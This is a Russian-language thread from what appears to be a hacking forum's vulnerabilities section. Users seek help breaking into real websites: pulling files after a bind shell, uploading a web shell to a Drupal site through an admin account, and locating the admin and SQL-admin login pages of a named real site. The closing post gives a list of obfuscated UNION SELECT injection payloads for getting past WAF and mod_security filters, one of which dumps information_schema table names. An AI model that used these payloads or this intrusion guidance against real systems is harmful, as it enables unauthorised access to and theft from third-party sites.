Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    257
    Likes Received:
    87
    Reputations:
    1
    Это понятно, в том то и вопрос как заблиндившесь на порте рекурсивно слить все на комп?
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    вообще по феншую на сервере поднимается rsync сервер с биндом порта, потом локальным rsync всё стягивается(абстракции там на уровне, вплоть до монтирования удаленной диры локально, если память не изменяет), точных команд не дам, надо ползти в маны
     
    _________________________
    Gorev likes this.
  3. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    то есть крутить вообще никак?
     
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    так прежде всего руками проверьте скуль, дело 5 минут, если руками крутиться надо искать причину почему скульмап не крутит(ваф или ещё что то)
     
    _________________________
  5. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    118
    Likes Received:
    48
    Reputations:
    14
    Выше человек сказал что делать, если не крутит - просто ошибка скрипта.
     
  6. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    https://rdot.org/forum/showthread.php?t=60
    изучи все от и до
    потом подумай, на какой хрен все это написали...
    if (в голову ничего не придет){
    new Петля->Мыло;
    }
    else echo $flag;
     
  7. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    я не понимаю зачем ты мне это предлагаешь, вопрос был поставлен четко, я уточнил есть ли возможность крутить при таком раскладе, ни один пейлоад не сработал, так что вопрос исчерпан!
     
  8. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    пытается отучить от скрипткидинга)
     
    _________________________
  9. foozzione

    foozzione Member

    Joined:
    20 Dec 2016
    Messages:
    79
    Likes Received:
    5
    Reputations:
    0
    в первую очередь руками чекал и так же чекал мапом, горело раскрутить, просто было уточнение, скорее это обычный эксепш пыховский...
     
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    постойте, руками чекалось наличие необработанного исключения(ошибки) или таки наличие вектора для атаки? [aywo] выразился грубо, но по сути хотел чтобы вы чекали наличие вектора, тогда вопросы были бы совсем другие и процесс был продуктивней
     
    _________________________
  11. rudu2

    rudu2 New Member

    Joined:
    16 Dec 2016
    Messages:
    45
    Likes Received:
    3
    Reputations:
    0
    В каком фаиле на системе opencart хранятся записи о том какие фаилы можно загружать в папку download
     
  12. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    уже написала в тему по Drupal, но мне кажется, её мало кто читает. Дублирую сюда, вопрос же ;)
    Всем привет
    drupal 6.20. Аккаунт с правами администратора
    Стандартные способы заливки шелла не помогают :( Кто что ещё подскажет?Что пробовала
    1) В модулях включила PHP filter
    2) По site/admin/settings/filters/ => Access denied You are not authorized to access this page.
    А значит, уже не получится включить формат php, и соответственно при добавлении блоков или страниц нельзя выбрать формат php... Этот способ облом
    3) Темы загружать не могу
    4) есть imce. Загружаю php => переименовывается в php_.txt. Загружаю .php3 => скачивается
    Загружаю .shtml - нормально открывается, но видна только html'ная часть, php код не исполняется, всё интерпретируется как html.
    5) пыталась загрузить опять же через imce .htaccess чтобы не скачивались файлы php3. Но облом, переименовывается в htaccess.

    В общем, не знаю, что ещё делать

    Кто что подскажет?
     
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,280
    Likes Received:
    429
    Reputations:
    234
    Code:
    http://www.biofuelstp.eu/
    Помогите админку найти!
     
  14. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Что делать,если сайт фильтрует:From,select,union+select,table_name,@@version ?
     
    #1734 SaNDER, 14 Feb 2017
    Last edited: 14 Feb 2017
  15. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    295
    Likes Received:
    136
    Reputations:
    29
  16. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    Что конкретно тебе подойдет можно только гадать. Зависит от того, Чем и Как фильтруется. Копай в сторону обфускации SQL-запросов.
    Вот небольшая подборка по теме:
    https://github.com/client9/libinjection/blob/master/data/sqli-rsalgado-bhusa2013.txt
     
    SaNDER likes this.
  17. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    Code:
    http://www.biofuelstp.eu/mapping/login.php
    http://biofuelstp.eu/sqladmin
    http://www.biofuelstp.eu/algaetaskforce/atf_home.html
     
    SaNDER, DezMond™ and erwerr2321 like this.
  18. cMs

    cMs New Member

    Joined:
    14 Feb 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток.

    Не подскажите как пробросить version() через WAF sweb.

    https://rdot.org/forum/showthread.php?t=60 - все выше перечисленные способы фильтрует.
     
  19. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Стандартная ошибка :
    Not Acceptable
    An appropriate representation of the requested resource .......... could not be found on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

    Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.17 mod_perl/2.0.6 Perl/v5.10.1 Server at www.............. Port 80
    mod_security by pass .
     
  20. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    попробуй что-то из следующего:
    https://rdot.org/forum/showthread.php?t=3481
    либо
    Code:
    id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
    
    id=1+uni%0bon+se%0blect+1,2,3--
    
    id=1+UNunionION+SEselectLECT+1,2,3--
    
    id=1+UnIoN/**/SeLecT/**/1,2,3--
    
    id=1+un/**/ion+se/**/lect+1,2,3--
    
    id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
    
    ?/%2A%2A/union/%2A%2A/select…
    
    1/*!UnIoN*/SeLecT+1,2,3--
    
    id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
    /*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
    
    
     
Loading...